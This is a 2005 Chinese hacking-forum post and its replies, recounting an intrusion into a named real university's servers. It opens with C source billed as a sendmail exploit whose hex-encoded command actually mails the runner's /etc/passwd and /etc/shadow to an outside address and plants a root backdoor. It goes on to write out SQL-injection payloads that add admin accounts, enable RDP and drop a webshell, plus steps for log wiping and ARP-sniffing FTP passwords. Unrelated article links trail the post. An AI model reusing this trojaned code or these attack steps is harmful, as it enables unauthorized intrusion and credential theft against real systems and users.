"\x2e\x70\x68\x75\x6e\x3b\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x68\x6f"

"\x73\x74\x73\x20\x20\x3e\x3e\x20\x69\x6e\x66\x6f\x2e\x70\x68\x75\x6e"

"\x3b\x65\x63\x68\x6f\x20\x22\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d"

"\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x22\x20\x3e\x3e\x20\x69\x6e\x66\x6f\x2e"

"\x70\x68\x75\x6e\x3b\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70\x61\x73"

"\x73\x77\x64\x20\x3e\x3e\x20\x69\x6e\x66\x6f\x2e\x70\x68\x75\x6e\x3b"

"\x65\x63\x68\x6f\x20\x22\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d"

"\x2d\x2d\x2d\x2d\x2d\x2d\x22\x20\x3e\x3e\x20\x69\x6e\x66\x6f\x2e\x70"

"\x68\x75\x6e\x3b\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x73\x68\x61\x64"

"\x6f\x77\x20\x3e\x3e\x20\x69\x6e\x66\x6f\x2e\x70\x68\x75\x6e\x3b\x65"

"\x63\x68\x6f\x20\x22\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d"

"\x2d\x2d\x2d\x2d\x2d\x22\x20\x3e\x3e\x20\x69\x6e\x66\x6f\x2e\x70\x68"

"\x75\x6e\x3b\x63\x61\x74\x20\x69\x6e\x66\x6f\x2e\x70\x68\x75\x6e\x20"

"\x7c\x20\x6d\x61\x69\x6c\x20\x68\x34\x78\x30\x72\x68\x34\x78\x33\x72"

"\x40\x68\x6f\x74\x6d\x61\x69\x6c\x2e\x63\x6f\x6d\x3b\x65\x63\x68\x6f"

"\x20\x62\x67\x70\x20\x20\x73\x74\x72\x65\x61\x6d\x20\x20\x74\x63\x70"

"\x20\x20\x20\x20\x20\x6e\x6f\x77\x61\x69\x74\x20\x20\x72\x6f\x6f\x74"

"\x20\x20\x20\x20\x2f\x62\x69\x6e\x2f\x73\x68\x20\x2f\x62\x69\x6e\x2f"

"\x73\x68\x20\x2d\x69\x20\x3e\x3e\x20\x2f\x65\x74\x63\x2f\x69\x6e\x65"

"\x7

4\x64\x2e\x63\x6f\x6e\x66\x3b\x6b\x69\x6c\x6c\x61\x6c\x6c\x20\x2d"

"\x48\x55\x50\x20\x69\x6e\x65\x74\x64\x3b\x63\x70\x20\x2f\x62\x69\x6e"

"\x2f\x73\x68\x20\x2f\x74\x6d\x70\x2f\x2e\x67\x6f\x74\x69\x74\x2d\x24"

"\x55\x53\x45\x52\x3b\x63\x68\x6d\x6f\x64\x20\x34\x37\x37\x37\x20\x2f"

"\x74\x6d\x70\x2f\x2e\x67\x6f\x74\x69\x74\x2d\x24\x55\x53\x45\x52\x3b"

"\x65\x63\x68\x6f\x20\x30\x77\x6e\x75\x3a\x3a\x30\x3a\x30\x3a\x30\x77"

"\x6e\x75\x3a\x2f\x72\x6f\x6f\x74\x3a\x2f\x62\x69\x6e\x2f\x73\x68\x20"

"\x3e\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x3b\x70\x77"

"\x63\x6f\x6e\x76\x3b";

intrev(inta){

 inti=1;

 if((*(char*)&i))return(a);

 return((a>>24)&0xff)|(((a>>16)&0xff)>8)&0xff)

}

charmsg[]="0dayHACKINGw4r3z!!!";

intmain(intargc,char**argv){

 structhostent*hp;

 structsockaddr_inadr;

 charbuffer[1024],*b,*ls=asmcode;

 intcount;

 inti,c,n,sck[2],fp,ptr6,jmp,cnt,ofs,flag=-1;

 

 printf("-------------------------------------------------------\n");

 printf("PRIVATEPRIVATEPRIVATEPRIVATEPRIVATEPRIVATEPRIVATE\n");

 printf(">>>SENDMAIL

 printf("PRIVATEPRIVATEPRIVATEPRIVATEPRIVATEPRIVATEPRIVATE\n");

 printf("-------------------------------------------------------\n");

 

 if(getuid()!=0)

 {

  printf("Sorry!!!\n");

  printf("Thisisverydangerousexploitforwholeinternet,andthat'swhyonlyrootuserscanuseit!!!\n");

  printf("Sorrykiddies:-))))\n");

  exit(0);

 }

 if(argc

  printf("USAGE:%saddressportnumtype\n",argv[0]);

  printf("address-targetaddress\n");

  printf("portnum-shouldbe25\n");

  printf("type-linux,openbsd,freebsd,netbsd,sunos\n");

  system(ls);exit(-1);

 }

 

 while((c=getopt(argc-1,&argv[1],"se"))!=-1){

   switch(c){

   case's':flag=1;break;

   case'e':flag=2;

   }

 }

 

 sck[0]=socket(AF_INET,SOCK_DGRAM,0);

 sck[1]=socket(AF_INET,SOCK_STREAM,0);

 printf("o Exploitingsendmailon%s-waitforr00tshell..",argv[1]);

 system(ls);for(count=0;count

 {printf(".");fflush(stdout);sleep(1);}

 adr.sin_family=AF_INET;

 adr.sin_port=htons(53);

 if((adr.sin_addr.s_addr=inet_addr(argv[1]))==-1){

   if((hp=gethostbyname(argv[1]))==NULL){

   }

 }

 if(connect(sck[0],(structsockaddr*)&adr,sizeof(adr))

 if(connect(sck[1],(structsockaddr*)&adr,sizeof(adr))

 printf("\no Exploitfailed:-(((,trytorunitonanothermachine!!!\n");

 exit(-1);

 i=sizeof(structsockaddr_in);

 if(getsockname(sck[1],(structsockaddr*)&adr,&i)==-1){

   structnetbuf{unsignedintmaxlen;unsignedintlen;char*buf;};

   structnetbufnb;

   ioctl(sck[1],(('S'

   nb.maxlen=0xffff;

   nb.len=sizeof(structsockaddr_in);;

   nb.buf=(char*)&adr;

   ioctl(sck[1],(('T'

 }

 n=ntohs(adr.sin_por

t);

 asmcode[4+48+2]=(unsignedchar)((n>>8)&0xff);

 asmcode[4+48+3]=(unsignedchar)(n&0xff);

 if(write(sck[0],msg,sizeof(msg))==-1)gotoerr;

 if((cnt=read(sck[0],buffer,sizeof(buffer)))==-1)gotoerr;

 

 printf("stackdump:\n");

 for(i=0;i

   printf("%s%02x",(i&(!(i%16)))?"\n":"",(unsignedchar)buffer[512+i]);

 }

 printf("\n\n");

 fp=rev(*(unsignedint*)&buffer[532]);

 ofs=(0xfe)-((fp-(fp&0xffffff00))&0xff);

 cnt=163;

 if((buffer[512+20+2]!=(char)0xff)&(buffer[512+20+3]!=(char)0xbf)){

   printf("systemdoesnotseemtobeavulnerablelinux\n");exit(1);

 }

 if(flag==1){

   printf("systemseemstoberunningsendmail,OK:-)\n");exit(-1);

 }

 if(cnt

   printf("frameptristoolowtobesuccessfullyexploited\n");exit(-1);

 }

 jmp=rev(fp-586);

 ptr6=rev((fp&0xffffff00)-12);

 fp=rev(fp&0xffffff00);

 printf("frameptr=0x%08xadr=%08xofs=%d",rev(fp),rev(jmp),ofs);

 printf("port=%04xconnected!",(unsignedshort)n);fflush(stdout);

 b=buffer;

 memcpy(b,"\xab\xcd\x01\x00\x00\x02\x00\x00\x00\x00\x00\x01",12);b+=12;

 for(i=0;i

 for(i=0;i>1);i++,b++)*b++=0x01;

 memcpy(b,"\x00\x00\x01\x00\x01",5);b+=5;

 for(i=0;i>1);i++,b++)*b++=0x01;

 *b++=28;

 memcpy(b,"\x06\x00\x00\x00",4);b+=4;

 memcpy(b,&fp,4);b+=4;

 memcpy(b,"\x06\x00\x00\x00",4);b+=4;

 memcpy(b,&jmp,4);b+=4;

 memcpy(b,&jmp,4);b+=4;

 memcpy(b,&fp,4);b+=4;

 memcpy(b,&ptr6,4);b+=4;

 cnt-=ofs+28;

 for(i=0;i>1);i++,b++)*b++=0x01;

 memcpy(b,"\x00\x00\x01\x00\x01\x00\x00\xfa\xff",9);b+=9;

 if(write(sck[0],buffer,b-buffer)==-1)gotoerr;

 sleep(1);printf("sent!\n");

 write(sck[1],"/bin/uname-a\n",14);

 while(1){

   fd_setfds;

   FD_ZERO(&fds);

   FD_SET(0,&fds);

   FD_SET(sck[1],&fds);

   if(select(FD_SETSIZE,&fds,NULL,NULL,NULL)){

     intcnt;

     charbuf[1024];

     if(FD_ISSET(0,&fds)){

       if((cnt=read(0,buf,1024))

         if(errno==EWOULDBLOCK||errno==EAGAIN)continue;

         elsebreak;

       }

       write(sck[1],buf,cnt);

     }

     if(FD_ISSET(sck[1],&fds)){

       if((cnt=read(sck[1],buf,1024))

         if(errno==EWOULDBLOCK||errno==EAGAIN)continue;

         elsebreak;

       }

       write(1,buf,cnt);

     }

   }

 }

 exit(0);

err:

 perror("error");exit(-1);

}

据说这个版本的溢出程序是所有sendmail溢出程序中成功率最高的.我赶快用gcc编译(若自己是windows操作统可以安装Cygwin,然后即可编译此溢出程序)

进入Cygwin然后输入gcc–oSendmailSendmail.C编译成功,然后按照溢出程序使用方法测试主站.输入Sendma

ilwww.ncut.edu.cn25,回车…….哎竟然失败了…….真是让人失望(我还是把源码放出来供同行使用,也许你测试的主机可以成功).看来此路不同,只能另想办法了.我苦思了一阵,恩,有思路了(下文我会详细的讲给大家).由于自己不在这所学校,在加上要考CET4所以我把我的思路和身在此学校的一位朋友交流了一下,然后此事再次被我搁置了,想考完试再说吧.后来几个月过后,听说这位朋友已经成功了,然后又发生了些事我就不提了,扫兴.总之还是得自己动手.这时候浏览这所学校主页的时候,直觉告诉我好像已经有网页木马了,用ie查看源码一看,哈哈,使用的竟然事咱们冰狐浪子大哥的网页木马.好了,现在就让我就来揭开这所大学被黑的内幕.

当时想出的能够黑掉这台SunOS的思路就是找同网段比较脆弱的机器当然最好是windows,从他的邻居下手,呵呵.(这种技术老鸟早已掌握了,所以再次重申此文是为菜鸟所写)然后通网段嗅探主机的ftp密码.当时我搁置此事的原因还有就是这个学校同网段的机器一般就屏蔽了外网IP,这样入侵起来极不方便,幸好我家离这所学校不远……好的,现在就让我们开工.

拿出我最喜欢的PortReady1.6扫描器,这个软件不尽开源而且扫描速度相当快.八进制这里有下载(51楼)

http://www.eviloctal.com/forum/read.php?fid=23&tid=4450&fpage=1&toread=&page=6

我们先来pingwww.ncut.edu.cn

得到主机IP为202.204.24.37,然后用PortReady1.6扫从202.204.24.1到202.204.24.255,只扫80端口.这样比较快.看看80端口返回的banner.如果是IIS5.0赶快用ie浏览一下如果再是asp的页面呵呵,那我就中奖了.扫完后发现符合要求的只有两台机器202.204.24.45和202.204.24.16.好先让我们看看202.204.24.45这台机器吧,这台机器有一个asp的”意见征集”系统,telnet202.204.24.451433显示1433端口关闭.然后我在用户登陆系统中试着填写.

用户名:admin密码:’or’’=’哈哈,竟然进去了,还别高兴的太早,里面一看原来好多页面好像已经别先进来的那个朋友删除了(可能是为了防止我进来吧),我telnet202.204.24.453389一看,3389开放,看来确实有人来过了.好还还有一台机器,说明还是有希望的.用ie打开202.204.24.16一看原来是个asp的考试系统,这回我美了哈哈.我找了注入点然后用NBSI2开始测试.关于注入点的寻找和手动测试权限,以及注入防范请见这里

http://www.eviloctal.com/forum/read.php?tid=998

小竹写的著名的”SQL注入天书”.

我找到的注入点为

http://eol.ncut.edu.cn/asp/admindatabaseedit.asp?id=1

用NBSI2测试后发现数据库为sqlserver而且权限是sa.哈哈,天助我也.我赶快加帐户,然后开启对方3389.

在ie中输入

http://eol.ncut.edu.cn/asp/admindatabaseedit.asp?id=1';execmaster.dbo.xp_cmdshell'netuserEvilCatestwebserver/add&#

39;—

然后将EvilCat提升为管理员

http://eol.ncut.edu.cn/asp/admindatabaseedit.asp?id=1';execmaster.dbo.xp_cmdshell'netlocalgroupadministratorsEvilCat/add'—

接着就是开3389了

http://eol.ncut.edu.cn/asp/admindatabaseedit.asp?id=1';execmaster.dbo.xp_cmdshell'echo[Components]>c:\EvilCat'—

http://eol.ncut.edu.cn/asp/admindatabaseedit.asp?id=1';execmaster.dbo.xp_cmdshell'echoTsEnable=on>>c:\EvilCat'—

http://eol.ncut.edu.cn/asp/admindatabaseedit.asp?id=1';execmaster.dbo.xp_cmdshell'sysocmgr/i:c:\winnt\inf\sysoc.inf/u:c:\EvilCat/q'—

成功的主机会开启3389而且会自动重启.

输入完后发现目标主机没有重启,真是叫人郁闷.算了,条条大路通罗马.我还是令想办法吧.这时我想起了开3389小工具,Open3389而且是开放源码的,论坛这里有下载,

http://www.eviloctal.com/forum/read.php?tid=7970

由于这个程序已经被列入病毒行列所以只好自己修改一下再编译,编译后用压缩软件加壳如udpshell这样程序会比较小,便于传输.再这里提示一句(注册为八进制会员后,会开启搜索功能,只要在搜索栏中输入关键字,你想要找的资料是很好找到的)

修改好程序后结下来就是文件传输了,文件传输的方法不只一种,比如ipc,tftp,ftp等,论坛里很早就讨论过了.自己搜索即可.我个人比较用webshell来传输文件,虽然不能传输很大的文件.得到webshell的放法如果是db_owner常用的是backupashell,菜鸟可以使用小路写的工具来获得,论坛这里有下载http://www.eviloctal.com/forum/read.php?tid=7891.关于原理,请看安全天使主页SuperHei的那几篇文章.这里既然是sa权限我们可以echoashell,具体做法如下:

我们先要得到网站的绝对路径

我们可以通过读取注册表的方法来获得,

http://eol.ncut.edu.cn/asp/admindatabaseedit.asp?id=1;DECLARE%20@result%20varchar(255)%20EXEC%20master.dbo.xp_regread%20'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual%20Roots',%20'/',%20@result%20output%20insert%20into%20temp%20(tmp)%20values(@result);--

当然后还有许多方法.如通过xp_dirtree存储过程得到绝对路进..

这里为了速度用NBSI2自动读取即可.

得到绝对路进为:

E:\www\asp\

然后写入一个一句话后门.

http://eol.ncut.edu.cn/asp/admindatabaseedit.asp?id=1';execmaster.dbo.xp_cmdshell'echo^""thenexecuterequest("a")%25^>>E:\www\asp\cat.asp'—

然后再次利用一句活后门写入一个海洋之类的,强大的后门.

一句话后门在八进制论坛自己搜索即可.

用海洋网页木马上传然后在ie中输入

http://eol.ncut.edu.cn/asp/admindatabaseedit.asp?id=1';execmaster.dbo.xp_cmdshell'E:\www\asp\3389.exe'—

结果主机还是没有重启,哎~~这种现象其实我不只遇到一次了,凭经验主机的只要重启必会开起3389

,因为程序已经自动设置注册表了,只不过没有重启.

办法还是有的,就是上传shutdown.exe这个程序是微软自己写的如果你是xp系统,这个程序就位于C:\WINDOWS\system32下.用webshell传上去后在ie中输入

http://eol.ncut.edu.cn/asp/admindatabaseedit.asp?id=1';execmaster.dbo.xp_cmdshell'E:\www\asp\shutdown.exe/R/T0'—

哈哈这回它终于重启了.重启后果然开放了3389,赶快用3389连接器连上去然后克隆一个管理员帐号,清除Ri志,修补注入漏洞,如果为了省事,就用现在的一些防注入程序即可,然后将sqlserver运行于低权限.重要的还有要留一个后门呵呵,用一般的后门容易被发现,用rootkit也经常被杀毒软件所杀.我还是自己想想办法吧

咱们来一个无文件,无端口,无进程,无启动项,无…..反正该有的都没有只具有系统权限的后门(有点夸张了),这个后门我相信杀毒软件这辈子是没戏查到它了,哈哈.不知道你还记得如何在IIS中建立一个隐藏目录吗?不知道的看这里http://www.eviloctal.com/forum/read.php?tid=7244,有工具还有动画.你还记得黑哥这篇>地址:http://www.4ngel.net/article/33.htm

特别要注意的是我们在建立隐藏的虚拟目录的时候要将,应用程序保护设为低,这样如果隐藏的目录下有一个webshell的话它可是系统权限,而且还要按照>一文所说的来配置那个即将隐藏的虚拟目录.这样我们就可以随时利用iis这个”漏洞”传送文件到那个隐藏的虚拟目录而且传上的asp木马还具有系统权限.这样一来我们是没有必要在这个隐藏的虚拟目录下放任何文件的.须要后门时用>中提供的工具送上去即可.但是要注意的是用这个种方法传送文件会在Ri志中留下记录,隐藏的虚拟目录也会暴露,所以每用一次记得要清理Ri志呀,这样以来完全可以在我们完成任务后卸载3389.

接下来就要嗅探这所大学的主站了ftp了.具体做法如下:

在3389中下载arpsniffer.exe榕哥的交换环境下嗅探工具,然后还要安装嗅探所要用到的驱动程序WinPcap.exe,为了方便大家,我在附件中将这两件工具打包提供下载.

安装好winpacap2.1驱动后最好让主机重启,避免发生错误.

重启后,在命令行下输入ipconfig查看这个网段的网关地址.在命令行下输入

arpsniffer.exe202.204.24.254202.204.24.3721C:\WINDOWS\system32\log.txt1

这里202.204.24.254是网关,202.204.24.37是北方工业大学的主站ip地址.如果成功嗅探到主机的ftp密码会在C:\WINDOWS\system32\log.txt生成文件.当然为了安全,我们可以像小路在>中所说的那样,在webshell中启动arpsniffer.现在我们要做的就是等学校主站的管理员登陆ftp了.入侵也到了尾声.好了,我就写到这里了.文章中有什么

不懂的可以在八进制论坛直接与我交流,或者用论坛的搜索程序自己搜索相关内容.

后记:

其实,我记得这台主机的同网段还有一台linux有个phpbb论坛,用phpbb当时的那个写入一个webshell的漏洞,写入一个php的shell然后wget一个绑定端口的后门然后gcc编译,然后装上这个绑定端口的后门,连接这个低权限的后门,然后uname-r看看内核版本,上google找对应的localexploit,wget下载gcc编译然后exploit,得到root,然后再装rootkit,接着装个sniffer嗅探是一样的.当初我也实验了.听说那台202.204.24.45进后台有上传漏洞,即便没有上传,暴出数据库看看是不是asp的若是那么就利用改mdb为asp带来的灾难中说的方法,就成了,由于ftp是servu也是可以localexploit的这些东西对于老鸟绝对可以一笔带过的.我先选择同网段的这台windows作为第一个攻击目标因为很快就能达到我的目的,也比较省事,我想换成是您,您也会选择最脆弱的机器下手.当初和冰血讨论是否写这篇文章,我们觉得适合beginner的文章好像少了,就有了这篇文章.

[此贴被恶猫在07-19-200516:43重新编辑]

附件:arpsni5.zip(872K)下载次数:142顶部 kevin1986 发布于:2005-07-1908:54 [1楼]

其实从Web\SQLHack到Arpsniff的技术都是通用的,和主机类型没有特别的关系.

还有,并非所有的Web-Database都是在同一个交换机下面的,拿下DatabaseHOST之后,需要Tracert或者Ping一下,来判断猜测是否是正确的..求个快,不如求个稳顶部 blackhorse 发布于:2005-07-1909:29 [2楼]

菜鸟也玩SunOS

hoho~!~有误导的嫌疑哦.

还有最终ftp拿到没?

拿到后是否能提权?

...期待后文...顶部 恶猫 发布于:2005-07-1911:13 [3楼]

Quote:

下面是引用kevin1986于07-19-200508:54发表的:

其实从WebSQLHack到Arpsniff的技术都是通用的,和主机类型没有特别的关系.

还有,并非所有的Web-Database都是在同一个交换机下面的,拿下DatabaseHOST之后,需要Tracert或者Ping一下,来判断猜测是否是正确的..求个快,不如求个稳

呵呵,我前面已经说有人成功了,说明确实是位于同一交换机下,关于用tracert命令来判断,是我没有写清楚,谢谢kevin1986补充,还有文章是面向菜鸟,还有就是文章是揭密性质的......顶部 virgo霜风 发布于:2005-07-1912:14 [4楼]

本文题目与内容有点不符啊

题目感觉是要教大家机遇SUNOS的入侵技术但这里只是简单的SQLINJECTION和ARPSNIFFER有点文不对题顶部 EvilCat 发布于:2005-07-1912:20 [5楼]

Quote:

下面是引用virgo霜风于07-19-200512:14发表的:

本文题目与内容有点不符啊

题目感觉是要教大家机遇SUNOS的入侵技术但这里只是简单的SQLINJECTION和ARPSNIFFER有点文不对题

谢谢,霜风指正,没错是简单的注入和sniffer,但是目的是不一样的.由于我学识肤浅,我了解的

能够碰到只有静态页面的sunos就这么一招了,自己也不会发现unix的remoteexploit.欢迎老鸟来拍砖,觉得文章实在是垃圾我马上删帖顶部 EvilCat 发布于:2005-07-1912:48 [6楼]

Quote:

下面是引用十四郎于07-19-200512:44发表的:

感觉不错

但我还是不是很明白

谢谢,楼上支持,我要是再写的简单一些,估计我就被人拍死了......

楼上要是对hacking比较感兴趣,推荐读一读"攻防技术"的子版"脚本安全攻与防"看看早期的一些文章.顶部 EvilCat 发布于:2005-07-1912:50 [7楼]

Quote:

下面是引用reject于07-19-200512:48发表的:

呵呵,文章写的不错`就是这标题....

好的,应楼上要求我把标题改掉,在这里也向大家道歉了

由原来的>

改为>顶部 sunlion 发布于:2005-07-1913:17 [8楼]

写得不错的,呵呵,鼓励一下!思路很快阔、大家不要只是看到结果,其实作者在文章中提到的很多思路,是很实用的,大家应该仔细的多看两篇(对与菜鸟而言,其实我也是一个菜鸟),真的里面的思路真的不错,呵呵,鼓励一下!:)顶部 yezhan 发布于:2005-07-1913:55 [9楼]

安装好winpacap2.1驱动后最好让主机重启,避免发生错误

我关心的是

怎么实现的?(c)Copyleft2003-2007,EvilOctalSecurityTeam.

ThisfileisdecompiledbyanunregisteredversionofChmDecompiler.

Regsiteredversiondoesnotshowthismessage.

YoucandownloadChmDecompilerat:http://www.zipghost.com/


相关文章

  • 最新内幕交易犯罪司法解释的缺陷与规则优化
  • 最新内幕交易犯罪司法解释的缺陷与规则优 化 谢杰  2013-04-19 11:38:23 来源:<法学>(沪)2012年10期 [内容提要]最新内幕交易犯罪司法解释相关条款存在实质性缺陷,有必要在深度反思的基础上提出规则优化 ...查看


  • 证券期货刑事法律风险防控--基于典型案例的分析
  • "证券期货刑事法律风险防控--基于典型案例的分析"研讨会综述 发布时间:2017年10月16日作者:证券委责任编辑:业务创新委 2017年9月25日下午,市律协证券基金期货法律专业委员会(以下称"证券委&quo ...查看


  • 日本证券市场内幕交易规制的最新动_省略_3年_金融商品交易法_修订为线索_段磊
  • 证券法律与监管 日本证券市场内幕交易规制的最新动态及借鉴 --以2013年<金融商品交易法>修订为线索 段磊 (东京大学法学政治学研究科,东京 113-0033) 摘要:日本国会于2013年6月12日通过了<金融商品交易法 ...查看


  • 内幕交易司法解释中预定交易计划条
  • 内幕交易司法解释中预定交易计划条款探讨 --以美国证监会10b5-1(C)规则为视角展开 郑晖 (上海财经大学法学院, 上海 200433) 摘要:为满足公司内部人合理证券交易的同时免受内幕交易责任追究的需要,美国证监会制定10b5-1(C ...查看


  • 揭秘高盛:一场关于金融资本的内幕
  • 是谁操控着美国的经济?是谁左右雷曼兄弟的破产? 是谁影响着石油的价格?是谁让中国企业有苦难言? 郎咸平在<高盛如何绑架美国政府>一文中说:"华尔街曾经盛传,是高盛的背后操纵导致竞争对手雷曼兄弟的破产,<石油战争& ...查看


  • 刑案三人谈:华为前高管.牛电科技创始人李某某涉嫌内幕交易案
  • 华为前高管.牛电科技创始人李某某涉嫌内幕交易一案,引起刑法实务界的关注.无讼阅读就有文章对该案被告人李某某无罪辩护的空间进行了探讨(具体文章请见文末相关阅读).今天向大家推荐的这篇文章,是一位从业多年的资深刑辩律师与一位高校刑法学教师以及一 ...查看


  • 甲方乙方联手:震惊江湖的七事件 杭萧钢构为最
  • http://www.jrj.com 2008-8-11 9:56:00 理财周报 广发借壳案:原高管涉嫌内幕交易亲属牟利 作为上市公司一方,对公司将要公布的利好消息一般都能做到提前获知,但全世界证券市场相关法律都严令禁止公司内部人员通过此 ...查看


  • 四川大学[金融法实务]17春在线作业2
  • 一.单选题(共 20 道试题,共 40 分.) V 1. 票据的效力主要取决于其在形式上是否符合票据法的要求,而不取决于取得票据的原因.票据因此得名为: A. 债权证券 B. 文义证券 C. 流通证券 D. 无因证券 2. 下列关于上市公司 ...查看


  • QFII制度与我国证券监管问题的法律分析
  • 均是精品,欢迎下载学习!!! 欢迎下载百度文库资源 资料均是本人搜集 均是精品,欢迎下载学习!!! QFII制度与我国证券监管问题的法律分析 郭 华 春 Legal Analysis of China's Security Regulato ...查看


  • 露的公开`公平`公正原则,
  • 宜宾纸业股份有限公司宜宾纸业股份有限公司 股份有限公司 内幕信息知情人管理制度 内幕信息知情人管理制度 第一章 总 则 第一条 为进一步规范宜宾纸业股份有限公司(以下简称"公司")内幕信息管第一条 理,加强内幕信息保密工 ...查看


热门内容